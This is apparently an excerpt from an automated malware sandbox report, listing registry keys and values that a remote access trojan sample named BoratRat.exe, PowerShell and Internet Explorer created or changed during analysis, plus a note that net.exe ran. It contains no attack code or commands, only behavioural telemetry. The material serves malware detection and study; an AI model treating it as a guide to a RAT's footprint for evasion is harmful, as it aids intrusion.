| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31115911" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 5000310000000000dd5844951000426f726174003c0009000400efbedd584495dd5844952e00000094aa02000000020000000000000000000000000000003ddb1e0042006f00720061007400000014000000 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = ffffffff | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 7800310000000000cb588aad1100557365727300640009000400efbec5522d60dd5826952e0000006c0500000000010000000000000000003a00000000008a45560055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 = 7e00310000000000dd58449511004465736b746f7000680009000400efbecb588aaddd5845952e000000745702000000010000000000000000003e00000000005eda3d004400650073006b0074006f007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370036003900000016000000 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 01000000030000000200000000000000ffffffff | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 = 5000310000000000cb58d9b2100041646d696e003c0009000400efbecb588aaddd5826952e0000006a570200000001000000000000000000000000000000e0ce8400410064006d0069006e00000014000000 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\NodeSlot = "6" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\MRUListEx = ffffffff | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
Runs net.exe
